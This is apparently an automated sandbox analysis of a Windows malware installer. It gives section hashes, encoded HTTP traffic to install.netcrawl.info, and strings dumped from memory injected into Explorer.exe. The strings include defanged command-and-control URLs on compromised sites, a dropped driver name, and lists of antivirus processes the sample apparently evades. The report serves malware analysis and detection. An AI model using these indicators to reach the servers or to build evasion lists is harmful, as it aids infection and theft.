- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 22738 | 23040 | 4.49116 | 4dde9ee04459a4d76108ba4e7e9cf6a4 |
.rdata | 28672 | 4496 | 4608 | 3.59034 | a2c7710fa66fcbb43c7ef0ab9eea5e9a |
.data | 36864 | 253816 | 1024 | 3.1957 | acf5fcee4a8110074c3935a8dde700a9 |
.ndata | 290816 | 688128 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 978944 | 81920 | 80384 | 5.5234 | b13f4a1cf59c57c4de44cfc5ec7498cd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== | |
hxxp://netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y | |
hxxp://netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== | |
hxxp://netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR | |
hxxp://netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= | |
hxxp://install.netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== | 8.34.112.26 |
hxxp://install.netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y | 8.34.112.26 |
hxxp://install.netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== | 8.34.112.26 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== HTTP/1.1
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 184148
QHKPEGQYa9RZFEVHsmw7VyrLGGsVZdAHLyRF2UByTz/BQihVW51sGDpL8HEnAHbKFFwYFusAXQ03nhkwBny6bEN8YtEeJEBy3EBPbS sbGxcK9UdJEQikiwxZVjYBh4Xf5ZTcx9QyjpWXiLFSXdPMfQUXBlCtGF CSeFXngTdq9TRzJilE82VnHbQSM2JKgiJVdymxRwBySefm5yXsgHNVpowV81BwSHbhZQdNpWYA5umD1jPHnzDjQcJZoUYE81kHlxSgWwYA5ia9tXZGI2iiE4RizWHVsDM7YAJ2NeywsrE2C/ahVAW88QSAgijwRzTTjPEGYRWbQALAIxghBuV3K7UEd9NJhYBEBy3EAjNiy8IjoefN8eegUipD0gb1rYISATcIgUa0Nf0yVfXiLKVWFbO8gRCkpSsE5lCWjMGToUdLcCGGoyiFkvDWWLTGUuePB ehAqwAFtRH3IFB9Ve59OagZyl15zHxzsL0kbbtdDd0I11gZ0LGSjTXUJN51cDxp5qlRNbGLRHiRActxAT20vrGxsXCvVHSREIpIsMWVY2AYeF3 WU3MfUMo6Vl4ixUl3TzH0FFwZQrRhfgknhV54E3avU0cyYpRPNlZx20EjNiSoIiVXcpsUcAcknn5ucl7IBzVaaMFfNQcEhmcWUHTaVmAObpg9YyNj8w40HCWaFGBPNZBZUXcuiVkgT3/FVl1QEb08P1w5ylMkRDGLMCFjYtwPLVQpjUM9SRKdM0ICZcBSYEgC2xldFRbrTGMAKMJeJBploEVsfzSUSjdidsxGai54ry86QTuVU2EVI50zJmIOhwQpGmCGGnNARt41TlA611RwSSmWDgoZUPMYL15ozAg7BXLhGgBWC65rcA082UR1ZGDzbAVLLdAffAM1hD04dXDhIz0CfLFDP1Yck3RME2zWQ0tNOd9XEh5BvU46TiGWDCcWY6ZEdH8siFlwG3DcSW0gYK8hJFE79xB8DzGPHzxjT9ZAchByj0U0CRzWJV4Fb9FCJxYy2xlbFRjzR24NJ5peeAFltkVfMjvfVTYDJJAWLS42sD4zEGSbOUM1EMhwdnZNyQpqTDGwTyJMUMszSBxhz1VZcATIGks0QbxSNEBmmB0uAHKNQU97YsdSJ01yhQdkdDKsLSJXOu8QZBMiyGY6c0DRTmoQfJFVNGtfyz9MF0PLQ2ZHdoATSRxHtA40BTeKCy0Hc EaRH8sjll A3vRRGJ4YPM6JEc7xF1zRC6Ofm4/GJFAPA9jhhRrB3b0BW1QLIFWZFg8mE8KPV2yUHkfK4gIHilAqk5GcTeOYA5ia9tXZGI2nyskQTfWH1Q6EoQ1OnVY3A4kKk iWCVMctAxXRdygQonWjXWAE0 VbxHNFYqmxAuWTWmWFJ7I4lZNnd/xVBkLninOzpecpsXZxQkjxI1ckXLBwsedoBdcx9Y3jpJFyyBT3ZII9UHTFIOt0N6HyHCXicNdqBUACQ0j0k3XDLSB2hoYPN3bh58zQh4A2XQfhxNf pAZFRjgkI5BwSdJUMBdNRDZEcI
<<< skipped >>>
POST /mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive
alpha=bCJoDyADD08zBl9NRyUvU2sqHCUyMWwzYBcyPwlPKCJzRTN6CWUMTmpmAn0FNyloXVplSQJ8ZXg5S1Y2a2oTDiIAJi9mLj8MfANjQ3tKbCIuPm5efHonIHMgGkx3TTxqcykZJTledXlObmB0CXEwNG1aXHoNRQA7MzJkAjtpdx4PJQgiIxlQSXR7D39hVgg8ZCM9eAsiKSo8ZXFcQWNNIGtzNgUkOFx0cUZqGz1uMBcgLg==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0
GET /mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 2004
aNEaHLo37W9O8F qJ2Dlf4leFLU9xkUL8QzmTEysZohaGPt07U943njrfWaWJtsNCZcs/2YU6he KCTZEOgKb4lEkQ1e ErSUl2tS40PJ/xGoV8YpDiNHDX5ctNsC/Mu9gRArSG/XDuIL8Z4S7Zh1RUXgzT7aAytPJceE g40ABNkEOGSgrifNFQBf1Cji4h7VScWBSgK6cXNelFrRII9zLDExatZO5OLYsoxxQQvWWbXBzaevI8T6swxUEE7ijRKwCHFIoMErYwjRALq12ROWCyOLVnLoFsyF0g61rnClS0DckFU F5 Fg0hTbQanaLdphMHIUrtwlBpi2TFAK cZYgTZBDhiZR4WyfBkeqSI1wYO1ijUkeoiuAKTHmW oKVPgr3BoWrWvyWDmBFMJCQ61htEcclTO1fkipKJQeXL40xzJbk0SHSgrqaNFPTPMGhCQj627fFgmkO4ECfPEM5kxMrGeBWhj7dO1PeN546315jCbbDQmXLP9mFOoXnggZ8inRJEKdWpA0bN99z1VHuFfDcGD e5FZGJgviRpysED6RAK6fNUOSupu6U8 sjvPQ0/5PplaFZp0tSJBuieCNRHoNMIzb5RTgAMStm/cUFq6CMM1Mextkl4Z9HSCHjz5S6MKC 4/0wIYtXnvXz ZdtgUQ78mzRZL2nrjPV6tZt1ZONcO43QA3kaCHFiuM59vUKxNjygn nScQA6KEqUKJOV8 kYdtHKSAFvjePhkO4k/gQxErmibA1uTIOchTbwhgy0R8CjRdBaSQ48EHK5v0k5KumqAKCv f75EGLUlxkU260L8TUK0N8MSTeB/ QhggjvPRU/3JpJXGJUstX5aujGCBlznf90yDsYP0EQS HDNWQvlBqkXEd840Q4NtzqMXWqoffZbB/gq1QRU7mHudga0KMxVbq5phw1V1C72KFutCoYWFb5n2iNAkBrBDUj8bN5ITLtygDA37TjHQgi6IshdNuVc7E0g9yrZAF/MZfhJMcZgxVdGqGHbDRCFPOArXKxm3R0R8C7Reg6ZToILRK4zyU5culnNJ2Dhft8WROJixgsp kutEkzeFeMhGKMv7UsujHiZFGeyZ4VACpk 4xhyny2JHx/rLugKb4lEkQ1e F/YTlq2S48AHt10lEIOoi IEwzWb FcB9ox1xFf/S xCCyFNtZTZLppkg1DmC37KALqIZ8LFf8p0TJ6nVqWDRK2Z8hQRfMGhzMw63 zTQm/OIE8OO9N5ApU8D/cBV jL/RZPpM10VII4WKWQwqTdLUhVqknk1lK6C/BM1HQTcEBVK4zjAwb8waVJTLtOMcONZ0ds118qF7uXAa0ZJI7U x/8lk1gi7/an2yapNADoUEywdbujaCFQTKOMYlRZNYvzRl4mDTT12 SI0AHt9zj0kOvi WFHKmDPlJAuM7/hdX6i nRC INo8UT6N0kkwNkzzBJUK9IcVBHukx2HoOmlmRC1XCaMlVX7pniTkh4zjHShy6PYFTcuNd618B5DqSTFzuYe5PdsY/21dJrybN
<<< skipped >>>
GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:39:20 GMT..Content-Length: 0......
GET /ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 84
gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5NuHTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:39:20 GMT..Content-Length: 84..gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5Nu....
Map
The Virus connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_532_rwx_01E00000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
Explorer.EXE_532_rwx_01E10000_00001000:
|explorer.exeM_532_
|explorer.exeM_532_
Explorer.EXE_532_rwx_038F0000_0108E000:
c:\windows
c:\windows
hXXp://erenkarahan.com/images/logo.gif
hXXp://erenkarahan.com/images/logo.gif
hXXp://gutekpl.za.pl/logo.gif
hXXp://gutekpl.za.pl/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://igorfomin.ru/logo.gif
hXXp://igorfomin.ru/logo.gif
hXXp://m2comunicacion.com/images/logo.gif
hXXp://m2comunicacion.com/images/logo.gif
hXXp://leenaenterprises.com/img/logo.gif
hXXp://leenaenterprises.com/img/logo.gif
hXXp://VVV.geriatriasinop.com.br/img/button.gif
hXXp://VVV.geriatriasinop.com.br/img/button.gif
hXXp://britishmotors.it/logo.gif
hXXp://britishmotors.it/logo.gif
hXXp://artroom.com.tr/blog/logo.gif
hXXp://artroom.com.tr/blog/logo.gif
hXXp://gammaconseil.fr/images/button.gif
hXXp://gammaconseil.fr/images/button.gif
hXXp://xexylia.com/logo.gif
hXXp://xexylia.com/logo.gif
%System%\drivers\olitq.sys
%System%\drivers\olitq.sys
8317508876
8317508876
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
hXXp://89.119.67.154/testo5/
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
hXXp://kukutrustnet987.info/home.gif
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
ntoskrnl.exe
ntoskrnl.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
GdiPlus.dll
hXXp://
hXXp://
ipfltdrv.sys
ipfltdrv.sys
VVV.microsoft.com
VVV.microsoft.com
?%x=%d
?%x=%d
&%x=%d
&%x=%d
SYSTEM.INI
SYSTEM.INI
USER32.DLL
USER32.DLL
.%c%s
.%c%s
\\.\amsint32
\\.\amsint32
NTDLL.DLL
NTDLL.DLL
autorun.inf
autorun.inf
ADVAPI32.DLL
ADVAPI32.DLL
win%s.exe
win%s.exe
%s.exe
%s.exe
WININET.DLL
WININET.DLL
InternetOpenUrlA
InternetOpenUrlA
avast! Web Scanner
avast! Web Scanner
Avira AntiVir Premium WebGuard
Avira AntiVir Premium WebGuard
cmdGuard
cmdGuard
cmdAgent
cmdAgent
Eset HTTP Server
Eset HTTP Server
ProtoPort Firewall service
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
SpIDer FS Monitor for Windows NT
Symantec Password Validation
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootDesktopFirewallDataService
WebrootFirewall
WebrootFirewall
%d%d.tmp
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
Explorer.exe
A2CMD.
A2CMD.
ASHWEBSV.
ASHWEBSV.
AVGCC.AVGCHSVX.
AVGCC.AVGCHSVX.
DRWEB
DRWEB
DWEBLLIO
DWEBLLIO
DWEBIO
DWEBIO
FSGUIEXE.
FSGUIEXE.
MCVSSHLD.
MCVSSHLD.
NPFMSG.
NPFMSG.
SYMSPORT.
SYMSPORT.
WEBSCANX.
WEBSCANX.
.adata
.adata
M_%d_
M_%d_
%c%d_%d
%c%d_%d
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
SHFileOperationA
SHFileOperationA
&3&3&3&389
&3&3&3&389
.rdata
.rdata
.data
.data
rnl.exe?
rnl.exe?
= =$=(=,=0=4=8=
= =$=(=,=0=4=8=
rv:1.9.2.3)
rv:1.9.2.3)
.NEtCLR
.NEtCLR
.klkjw:9fqwiBu
.klkjw:9fqwiBu
f3a.sysB
f3a.sysB
D6c.pBTab
D6c.pBTab
drfig%s:*:
drfig%s:*:
0}.T&?%x=
0}.T&?%x=
~UrlA'W
~UrlA'W
\'Web%
\'Web%
HTTP)s'PJ
HTTP)s'PJ
o.ENHCD
o.ENHCD
KPCKwWEBWUPD
KPCKwWEBWUPD
>*?456789:;
>*?456789:;
!"#$%&'()* ,-./01230 0
!"#$%&'()* ,-./01230 0
ADVAPI32.dll
ADVAPI32.dll
MSVCRT.dll
MSVCRT.dll
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll